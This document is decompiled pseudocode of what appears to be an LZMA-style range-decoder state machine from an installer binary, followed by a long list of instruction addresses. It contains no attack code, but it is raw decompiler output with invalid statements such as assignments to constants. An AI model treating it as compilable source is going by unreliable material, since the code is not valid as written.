                                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												L60:
                                                                                  												__eflags = __ebx - 0x100;
                                                                                  												if(__ebx >= 0x100) {
                                                                                  													L55:
                                                                                  													__al =  *(__ebp - 0x44);
                                                                                  													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                  													goto L56;
                                                                                  												}
                                                                                  												L61:
                                                                                  												__eax =  *(__ebp - 0x58);
                                                                                  												__edx = __ebx + __ebx;
                                                                                  												__ecx =  *(__ebp - 0x10);
                                                                                  												__esi = __edx + __eax;
                                                                                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                  												__ax =  *__esi;
                                                                                  												 *(__ebp - 0x54) = __esi;
                                                                                  												__edi = __ax & 0x0000ffff;
                                                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                  													__cx = __ax;
                                                                                  													_t217 = __edx + 1; // 0x1
                                                                                  													__ebx = _t217;
                                                                                  													__cx = __ax >> 5;
                                                                                  													__eflags = __eax;
                                                                                  													 *__esi = __ax;
                                                                                  												} else {
                                                                                  													 *(__ebp - 0x10) = __ecx;
                                                                                  													0x800 = 0x800 - __edi;
                                                                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                  													__ebx = __ebx + __ebx;
                                                                                  													 *__esi = __cx;
                                                                                  												}
                                                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  												 *(__ebp - 0x44) = __ebx;
                                                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  													goto L60;
                                                                                  												} else {
                                                                                  													goto L58;
                                                                                  												}
                                                                                  											case 0x10:
                                                                                  												L109:
                                                                                  												__eflags =  *(__ebp - 0x6c);
                                                                                  												if( *(__ebp - 0x6c) == 0) {
                                                                                  													 *(__ebp - 0x88) = 0x10;
                                                                                  													goto L170;
                                                                                  												}
                                                                                  												__ecx =  *(__ebp - 0x70);
                                                                                  												__eax =  *(__ebp - 0xc);
                                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												_t365 = __ebp - 0x70;
                                                                                  												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                  												__eflags =  *_t365;
                                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												goto L111;
                                                                                  											case 0x11:
                                                                                  												L68:
                                                                                  												_t614 =  *(_t621 - 0x58);
                                                                                  												 *(_t621 - 0x84) = 0x12;
                                                                                  												while(1) {
                                                                                  													L132:
                                                                                  													 *(_t621 - 0x54) = _t614;
                                                                                  													goto L133;
                                                                                  												}
                                                                                  											case 0x12:
                                                                                  												__eflags =  *(__ebp - 0x40);
                                                                                  												if( *(__ebp - 0x40) != 0) {
                                                                                  													__eax =  *(__ebp - 0x58);
                                                                                  													 *(__ebp - 0x84) = 0x13;
                                                                                  													__esi =  *(__ebp - 0x58) + 2;
                                                                                  													while(1) {
                                                                                  														L132:
                                                                                  														 *(_t621 - 0x54) = _t614;
                                                                                  														goto L133;
                                                                                  													}
                                                                                  												}
                                                                                  												__eax =  *(__ebp - 0x4c);
                                                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                  												__ecx =  *(__ebp - 0x58);
                                                                                  												__eax =  *(__ebp - 0x4c) << 4;
                                                                                  												__eflags = __eax;
                                                                                  												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                  												goto L130;
                                                                                  											case 0x13:
                                                                                  												__eflags =  *(__ebp - 0x40);
                                                                                  												if( *(__ebp - 0x40) != 0) {
                                                                                  													_t469 = __ebp - 0x58;
                                                                                  													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                  													__eflags =  *_t469;
                                                                                  													 *(__ebp - 0x30) = 0x10;
                                                                                  													 *(__ebp - 0x40) = 8;
                                                                                  													L144:
                                                                                  													 *(__ebp - 0x7c) = 0x14;
                                                                                  													goto L145;
                                                                                  												}
                                                                                  												__eax =  *(__ebp - 0x4c);
                                                                                  												__ecx =  *(__ebp - 0x58);
                                                                                  												__eax =  *(__ebp - 0x4c) << 4;
                                                                                  												 *(__ebp - 0x30) = 8;
                                                                                  												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                  												L130:
                                                                                  												 *(__ebp - 0x58) = __eax;
                                                                                  												 *(__ebp - 0x40) = 3;
                                                                                  												goto L144;
                                                                                  											case 0x14:
                                                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                  												__eax =  *(__ebp - 0x80);
                                                                                  												 *(_t621 - 0x88) = _t542;
                                                                                  												goto L1;
                                                                                  											case 0x15:
                                                                                  												__eax = 0;
                                                                                  												__eflags =  *(__ebp - 0x38) - 7;
                                                                                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                  												__al = __al & 0x000000fd;
                                                                                  												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                  												goto L120;
                                                                                  											case 0x16:
                                                                                  												__eax =  *(__ebp - 0x30);
                                                                                  												__eflags = __eax - 4;
                                                                                  												if(__eax >= 4) {
                                                                                  													_push(3);
                                                                                  													_pop(__eax);
                                                                                  												}
                                                                                  												__ecx =  *(__ebp - 4);
                                                                                  												 *(__ebp - 0x40) = 6;
                                                                                  												__eax = __eax << 7;
                                                                                  												 *(__ebp - 0x7c) = 0x19;
                                                                                  												 *(__ebp - 0x58) = __eax;
                                                                                  												goto L145;
                                                                                  											case 0x17:
                                                                                  												L145:
                                                                                  												__eax =  *(__ebp - 0x40);
                                                                                  												 *(__ebp - 0x50) = 1;
                                                                                  												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                  												goto L149;
                                                                                  											case 0x18:
                                                                                  												L146:
                                                                                  												__eflags =  *(__ebp - 0x6c);
                                                                                  												if( *(__ebp - 0x6c) == 0) {
                                                                                  													 *(__ebp - 0x88) = 0x18;
                                                                                  													goto L170;
                                                                                  												}
                                                                                  												__ecx =  *(__ebp - 0x70);
                                                                                  												__eax =  *(__ebp - 0xc);
                                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												_t484 = __ebp - 0x70;
                                                                                  												 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                  												__eflags =  *_t484;
                                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												L148:
                                                                                  												_t487 = __ebp - 0x48;
                                                                                  												 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                  												__eflags =  *_t487;
                                                                                  												L149:
                                                                                  												__eflags =  *(__ebp - 0x48);
                                                                                  												if( *(__ebp - 0x48) <= 0) {
                                                                                  													__ecx =  *(__ebp - 0x40);
                                                                                  													__ebx =  *(__ebp - 0x50);
                                                                                  													0 = 1;
                                                                                  													__eax = 1 << __cl;
                                                                                  													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                  													__eax =  *(__ebp - 0x7c);
                                                                                  													 *(__ebp - 0x44) = __ebx;
                                                                                  													while(1) {
                                                                                  														 *(_t621 - 0x88) = _t542;
                                                                                  														goto L1;
                                                                                  													}
                                                                                  												}
                                                                                  												__eax =  *(__ebp - 0x50);
                                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                  												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                  												__eax =  *(__ebp - 0x58);
                                                                                  												__esi = __edx + __eax;
                                                                                  												 *(__ebp - 0x54) = __esi;
                                                                                  												__ax =  *__esi;
                                                                                  												__edi = __ax & 0x0000ffff;
                                                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                  													__cx = __ax;
                                                                                  													__cx = __ax >> 5;
                                                                                  													__eax = __eax - __ecx;
                                                                                  													__edx = __edx + 1;
                                                                                  													__eflags = __edx;
                                                                                  													 *__esi = __ax;
                                                                                  													 *(__ebp - 0x50) = __edx;
                                                                                  												} else {
                                                                                  													 *(__ebp - 0x10) = __ecx;
                                                                                  													0x800 = 0x800 - __edi;
                                                                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                  													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                  													 *__esi = __cx;
                                                                                  												}
                                                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  													goto L148;
                                                                                  												} else {
                                                                                  													goto L146;
                                                                                  												}
                                                                                  											case 0x19:
                                                                                  												__eflags = __ebx - 4;
                                                                                  												if(__ebx < 4) {
                                                                                  													 *(__ebp - 0x2c) = __ebx;
                                                                                  													L119:
                                                                                  													_t393 = __ebp - 0x2c;
                                                                                  													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                  													__eflags =  *_t393;
                                                                                  													L120:
                                                                                  													__eax =  *(__ebp - 0x2c);
                                                                                  													__eflags = __eax;
                                                                                  													if(__eax == 0) {
                                                                                  														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                  														goto L170;
                                                                                  													}
                                                                                  													__eflags = __eax -  *(__ebp - 0x60);
                                                                                  													if(__eax >  *(__ebp - 0x60)) {
                                                                                  														goto L171;
                                                                                  													}
                                                                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                  													__eax =  *(__ebp - 0x30);
                                                                                  													_t400 = __ebp - 0x60;
                                                                                  													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                  													__eflags =  *_t400;
                                                                                  													goto L123;
                                                                                  												}
                                                                                  												__ecx = __ebx;
                                                                                  												__eax = __ebx;
                                                                                  												__ecx = __ebx >> 1;
                                                                                  												__eax = __ebx & 0x00000001;
                                                                                  												__ecx = (__ebx >> 1) - 1;
                                                                                  												__al = __al | 0x00000002;
                                                                                  												__eax = (__ebx & 0x00000001) << __cl;
                                                                                  												__eflags = __ebx - 0xe;
                                                                                  												 *(__ebp - 0x2c) = __eax;
                                                                                  												if(__ebx >= 0xe) {
                                                                                  													__ebx = 0;
                                                                                  													 *(__ebp - 0x48) = __ecx;
                                                                                  													L102:
                                                                                  													__eflags =  *(__ebp - 0x48);
                                                                                  													if( *(__ebp - 0x48) <= 0) {
                                                                                  														__eax = __eax + __ebx;
                                                                                  														 *(__ebp - 0x40) = 4;
                                                                                  														 *(__ebp - 0x2c) = __eax;
                                                                                  														__eax =  *(__ebp - 4);
                                                                                  														__eax =  *(__ebp - 4) + 0x644;
                                                                                  														__eflags = __eax;
                                                                                  														L108:
                                                                                  														__ebx = 0;
                                                                                  														 *(__ebp - 0x58) = __eax;
                                                                                  														 *(__ebp - 0x50) = 1;
                                                                                  														 *(__ebp - 0x44) = 0;
                                                                                  														 *(__ebp - 0x48) = 0;
                                                                                  														L112:
                                                                                  														__eax =  *(__ebp - 0x40);
                                                                                  														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                  														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                  															_t391 = __ebp - 0x2c;
                                                                                  															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                  															__eflags =  *_t391;
                                                                                  															goto L119;
                                                                                  														}
                                                                                  														__eax =  *(__ebp - 0x50);
                                                                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                  														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                  														__eax =  *(__ebp - 0x58);
                                                                                  														__esi = __edi + __eax;
                                                                                  														 *(__ebp - 0x54) = __esi;
                                                                                  														__ax =  *__esi;
                                                                                  														__ecx = __ax & 0x0000ffff;
                                                                                  														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                  														__eflags =  *(__ebp - 0xc) - __edx;
                                                                                  														if( *(__ebp - 0xc) >= __edx) {
                                                                                  															__ecx = 0;
                                                                                  															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                  															__ecx = 1;
                                                                                  															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                  															__ebx = 1;
                                                                                  															__ecx =  *(__ebp - 0x48);
                                                                                  															__ebx = 1 << __cl;
                                                                                  															__ecx = 1 << __cl;
                                                                                  															__ebx =  *(__ebp - 0x44);
                                                                                  															__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                  															__cx = __ax;
                                                                                  															__cx = __ax >> 5;
                                                                                  															__eax = __eax - __ecx;
                                                                                  															__edi = __edi + 1;
                                                                                  															__eflags = __edi;
                                                                                  															 *(__ebp - 0x44) = __ebx;
                                                                                  															 *__esi = __ax;
                                                                                  															 *(__ebp - 0x50) = __edi;
                                                                                  														} else {
                                                                                  															 *(__ebp - 0x10) = __edx;
                                                                                  															0x800 = 0x800 - __ecx;
                                                                                  															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                  															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                  															 *__esi = __dx;
                                                                                  														}
                                                                                  														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  														if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  															L111:
                                                                                  															_t368 = __ebp - 0x48;
                                                                                  															 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                  															__eflags =  *_t368;
                                                                                  															goto L112;
                                                                                  														} else {
                                                                                  															goto L109;
                                                                                  														}
                                                                                  													}
                                                                                  													__ecx =  *(__ebp - 0xc);
                                                                                  													__ebx = __ebx + __ebx;
                                                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                  													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                  													 *(__ebp - 0x44) = __ebx;
                                                                                  													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                  														__ecx =  *(__ebp - 0x10);
                                                                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                  														__ebx = __ebx | 0x00000001;
                                                                                  														__eflags = __ebx;
                                                                                  														 *(__ebp - 0x44) = __ebx;
                                                                                  													}
                                                                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  														L101:
                                                                                  														_t338 = __ebp - 0x48;
                                                                                  														 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                  														__eflags =  *_t338;
                                                                                  														goto L102;
                                                                                  													} else {
                                                                                  														goto L99;
                                                                                  													}
                                                                                  												}
                                                                                  												__edx =  *(__ebp - 4);
                                                                                  												__eax = __eax - __ebx;
                                                                                  												 *(__ebp - 0x40) = __ecx;
                                                                                  												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                  												goto L108;
                                                                                  											case 0x1a:
                                                                                  												L56:
                                                                                  												__eflags =  *(__ebp - 0x64);
                                                                                  												if( *(__ebp - 0x64) == 0) {
                                                                                  													 *(__ebp - 0x88) = 0x1a;
                                                                                  													goto L170;
                                                                                  												}
                                                                                  												__ecx =  *(__ebp - 0x68);
                                                                                  												__al =  *(__ebp - 0x5c);
                                                                                  												__edx =  *(__ebp - 8);
                                                                                  												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                  												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                  												 *( *(__ebp - 0x68)) = __al;
                                                                                  												__ecx =  *(__ebp - 0x14);
                                                                                  												 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                  												__eax = __ecx + 1;
                                                                                  												__edx = 0;
                                                                                  												_t192 = __eax %  *(__ebp - 0x74);
                                                                                  												__eax = __eax /  *(__ebp - 0x74);
                                                                                  												__edx = _t192;
                                                                                  												goto L79;
                                                                                  											case 0x1b:
                                                                                  												L75:
                                                                                  												__eflags =  *(__ebp - 0x64);
                                                                                  												if( *(__ebp - 0x64) == 0) {
                                                                                  													 *(__ebp - 0x88) = 0x1b;
                                                                                  													goto L170;
                                                                                  												}
                                                                                  												__eax =  *(__ebp - 0x14);
                                                                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                  												__eflags = __eax -  *(__ebp - 0x74);
                                                                                  												if(__eax >=  *(__ebp - 0x74)) {
                                                                                  													__eax = __eax +  *(__ebp - 0x74);
                                                                                  													__eflags = __eax;
                                                                                  												}
                                                                                  												__edx =  *(__ebp - 8);
                                                                                  												__cl =  *(__eax + __edx);
                                                                                  												__eax =  *(__ebp - 0x14);
                                                                                  												 *(__ebp - 0x5c) = __cl;
                                                                                  												 *(__eax + __edx) = __cl;
                                                                                  												__eax = __eax + 1;
                                                                                  												__edx = 0;
                                                                                  												_t274 = __eax %  *(__ebp - 0x74);
                                                                                  												__eax = __eax /  *(__ebp - 0x74);
                                                                                  												__edx = _t274;
                                                                                  												__eax =  *(__ebp - 0x68);
                                                                                  												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                  												_t283 = __ebp - 0x64;
                                                                                  												 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                  												__eflags =  *_t283;
                                                                                  												 *( *(__ebp - 0x68)) = __cl;
                                                                                  												L79:
                                                                                  												 *(__ebp - 0x14) = __edx;
                                                                                  												goto L80;
                                                                                  											case 0x1c:
                                                                                  												while(1) {
                                                                                  													L123:
                                                                                  													__eflags =  *(__ebp - 0x64);
                                                                                  													if( *(__ebp - 0x64) == 0) {
                                                                                  														break;
                                                                                  													}
                                                                                  													__eax =  *(__ebp - 0x14);
                                                                                  													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                  													__eflags = __eax -  *(__ebp - 0x74);
                                                                                  													if(__eax >=  *(__ebp - 0x74)) {
                                                                                  														__eax = __eax +  *(__ebp - 0x74);
                                                                                  														__eflags = __eax;
                                                                                  													}
                                                                                  													__edx =  *(__ebp - 8);
                                                                                  													__cl =  *(__eax + __edx);
                                                                                  													__eax =  *(__ebp - 0x14);
                                                                                  													 *(__ebp - 0x5c) = __cl;
                                                                                  													 *(__eax + __edx) = __cl;
                                                                                  													__eax = __eax + 1;
                                                                                  													__edx = 0;
                                                                                  													_t414 = __eax %  *(__ebp - 0x74);
                                                                                  													__eax = __eax /  *(__ebp - 0x74);
                                                                                  													__edx = _t414;
                                                                                  													__eax =  *(__ebp - 0x68);
                                                                                  													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                  													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                  													__eflags =  *(__ebp - 0x30);
                                                                                  													 *( *(__ebp - 0x68)) = __cl;
                                                                                  													 *(__ebp - 0x14) = _t414;
                                                                                  													if( *(__ebp - 0x30) > 0) {
                                                                                  														continue;
                                                                                  													} else {
                                                                                  														L80:
                                                                                  														 *(__ebp - 0x88) = 2;
                                                                                  														goto L1;
                                                                                  													}
                                                                                  												}
                                                                                  												 *(__ebp - 0x88) = 0x1c;
                                                                                  												goto L170;
                                                                                  										}
                                                                                  									}
                                                                                  									L171:
                                                                                  									_t544 = _t543 | 0xffffffff;
                                                                                  									goto L172;
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  					goto L1;
                                                                                  				}
                                                                                  			}














                                                                                  0x00000000
                                                                                  0x00406ffe
                                                                                  0x00406ffe
                                                                                  0x00407002
                                                                                  0x00407023
                                                                                  0x0040702a
                                                                                  0x00407030
                                                                                  0x00407036
                                                                                  0x00407048
                                                                                  0x0040704e
                                                                                  0x00407053
                                                                                  0x00000000
                                                                                  0x00407004
                                                                                  0x0040700a
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x004073ce
                                                                                  0x004073ce
                                                                                  0x004073ce
                                                                                  0x004073d4
                                                                                  0x004073da
                                                                                  0x004073e0
                                                                                  0x004073fa
                                                                                  0x004073fd
                                                                                  0x00407403
                                                                                  0x0040740e
                                                                                  0x00407410
                                                                                  0x004073e2
                                                                                  0x004073e2
                                                                                  0x004073f1
                                                                                  0x004073f5
                                                                                  0x004073f5
                                                                                  0x0040741a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040741c
                                                                                  0x00407420
                                                                                  0x004075cf
                                                                                  0x004075e5
                                                                                  0x004075ed
                                                                                  0x004075f4
                                                                                  0x004075f6
                                                                                  0x004075fd
                                                                                  0x00407601
                                                                                  0x00407601
                                                                                  0x0040742c
                                                                                  0x00407433
                                                                                  0x0040743b
                                                                                  0x0040743e
                                                                                  0x00407441
                                                                                  0x00407441
                                                                                  0x00407447
                                                                                  0x00407447
                                                                                  0x00406be3
                                                                                  0x00406be3
                                                                                  0x00406be3
                                                                                  0x00406bec
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406bf2
                                                                                  0x00000000
                                                                                  0x00406bfd
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406c06
                                                                                  0x00406c09
                                                                                  0x00406c0c
                                                                                  0x00406c10
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406c16
                                                                                  0x00406c19
                                                                                  0x00406c1b
                                                                                  0x00406c1c
                                                                                  0x00406c1f
                                                                                  0x00406c21
                                                                                  0x00406c22
                                                                                  0x00406c24
                                                                                  0x00406c27
                                                                                  0x00406c2c
                                                                                  0x00406c31
                                                                                  0x00406c3a
                                                                                  0x00406c4d
                                                                                  0x00406c50
                                                                                  0x00406c5c
                                                                                  0x00406c84
                                                                                  0x00406c86
                                                                                  0x00406c94
                                                                                  0x00406c94
                                                                                  0x00406c98
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406c88
                                                                                  0x00406c88
                                                                                  0x00406c8b
                                                                                  0x00406c8c
                                                                                  0x00406c8c
                                                                                  0x00000000
                                                                                  0x00406c88
                                                                                  0x00406c62
                                                                                  0x00406c67
                                                                                  0x00406c67
                                                                                  0x00406c70
                                                                                  0x00406c78
                                                                                  0x00406c7b
                                                                                  0x00000000
                                                                                  0x00406c81
                                                                                  0x00406c81
                                                                                  0x00000000
                                                                                  0x00406c81
                                                                                  0x00000000
                                                                                  0x00406c9e
                                                                                  0x00406c9e
                                                                                  0x00406ca2
                                                                                  0x0040754e
                                                                                  0x00000000
                                                                                  0x0040754e
                                                                                  0x00406cab
                                                                                  0x00406cbb
                                                                                  0x00406cbe
                                                                                  0x00406cc1
                                                                                  0x00406cc1
                                                                                  0x00406cc1
                                                                                  0x00406cc4
                                                                                  0x00406cc8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406cca
                                                                                  0x00406cd0
                                                                                  0x00406cfa
                                                                                  0x00406d00
                                                                                  0x00406d07
                                                                                  0x00000000
                                                                                  0x00406d07
                                                                                  0x00406cd6
                                                                                  0x00406cd9
                                                                                  0x00406cde
                                                                                  0x00406cde
                                                                                  0x00406ce9
                                                                                  0x00406cf1
                                                                                  0x00406cf4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406d39
                                                                                  0x00406d3f
                                                                                  0x00406d42
                                                                                  0x00406d4f
                                                                                  0x00406d57
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406d0e
                                                                                  0x00406d0e
                                                                                  0x00406d12
                                                                                  0x0040755d
                                                                                  0x00000000
                                                                                  0x0040755d
                                                                                  0x00406d1e
                                                                                  0x00406d29
                                                                                  0x00406d29
                                                                                  0x00406d29
                                                                                  0x00406d2c
                                                                                  0x00406d2f
                                                                                  0x00406d32
                                                                                  0x00406d37
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004073ce
                                                                                  0x004073ce
                                                                                  0x004073d4
                                                                                  0x004073da
                                                                                  0x004073e0
                                                                                  0x004073fa
                                                                                  0x004073fd
                                                                                  0x00407403
                                                                                  0x0040740e
                                                                                  0x00407410
                                                                                  0x004073e2
                                                                                  0x004073e2
                                                                                  0x004073f1
                                                                                  0x004073f5
                                                                                  0x004073f5
                                                                                  0x0040741a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406d5f
                                                                                  0x00406d61
                                                                                  0x00406d64
                                                                                  0x00406dd5
                                                                                  0x00406dd8
                                                                                  0x00406ddb
                                                                                  0x00406de2
                                                                                  0x00406dec
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x00000000
                                                                                  0x004073cb
                                                                                  0x00406d66
                                                                                  0x00406d6a
                                                                                  0x00406d6d
                                                                                  0x00406d6f
                                                                                  0x00406d72
                                                                                  0x00406d75
                                                                                  0x00406d77
                                                                                  0x00406d7a
                                                                                  0x00406d7c
                                                                                  0x00406d81
                                                                                  0x00406d84
                                                                                  0x00406d87
                                                                                  0x00406d8b
                                                                                  0x00406d92
                                                                                  0x00406d95
                                                                                  0x00406d9c
                                                                                  0x00406da0
                                                                                  0x00406da8
                                                                                  0x00406da8
                                                                                  0x00406da8
                                                                                  0x00406da2
                                                                                  0x00406da2
                                                                                  0x00406da2
                                                                                  0x00406d97
                                                                                  0x00406d97
                                                                                  0x00406d97
                                                                                  0x00406dac
                                                                                  0x00406daf
                                                                                  0x00406dcd
                                                                                  0x00406dcf
                                                                                  0x00000000
                                                                                  0x00406db1
                                                                                  0x00406db1
                                                                                  0x00406db4
                                                                                  0x00406db7
                                                                                  0x00406dba
                                                                                  0x00406dbc
                                                                                  0x00406dbc
                                                                                  0x00406dbc
                                                                                  0x00406dbf
                                                                                  0x00406dc2
                                                                                  0x00406dc4
                                                                                  0x00406dc5
                                                                                  0x00406dc8
                                                                                  0x00000000
                                                                                  0x00406dc8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407068
                                                                                  0x0040706c
                                                                                  0x0040708f
                                                                                  0x00407092
                                                                                  0x00407095
                                                                                  0x0040709f
                                                                                  0x0040706e
                                                                                  0x0040706e
                                                                                  0x00407071
                                                                                  0x00407074
                                                                                  0x00407077
                                                                                  0x00407084
                                                                                  0x00407087
                                                                                  0x00407087
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x00000000
                                                                                  0x004073cb
                                                                                  0x00000000
                                                                                  0x004070ab
                                                                                  0x004070af
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004070b5
                                                                                  0x004070b9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004070bf
                                                                                  0x004070c1
                                                                                  0x004070c5
                                                                                  0x004070c5
                                                                                  0x004070c8
                                                                                  0x004070cc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040711c
                                                                                  0x00407120
                                                                                  0x00407127
                                                                                  0x0040712a
                                                                                  0x0040712d
                                                                                  0x00407137
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x00000000
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x00407122
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407143
                                                                                  0x00407147
                                                                                  0x0040714e
                                                                                  0x00407151
                                                                                  0x00407154
                                                                                  0x00407149
                                                                                  0x00407149
                                                                                  0x00407149
                                                                                  0x00407157
                                                                                  0x0040715a
                                                                                  0x0040715d
                                                                                  0x0040715d
                                                                                  0x00407160
                                                                                  0x00407163
                                                                                  0x00407166
                                                                                  0x00407166
                                                                                  0x00407169
                                                                                  0x00407170
                                                                                  0x00407175
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407203
                                                                                  0x00407203
                                                                                  0x00407207
                                                                                  0x004075a5
                                                                                  0x00000000
                                                                                  0x004075a5
                                                                                  0x0040720d
                                                                                  0x00407210
                                                                                  0x00407213
                                                                                  0x00407217
                                                                                  0x0040721a
                                                                                  0x00407220
                                                                                  0x00407222
                                                                                  0x00407222
                                                                                  0x00407222
                                                                                  0x00407225
                                                                                  0x00407228
                                                                                  0x00000000
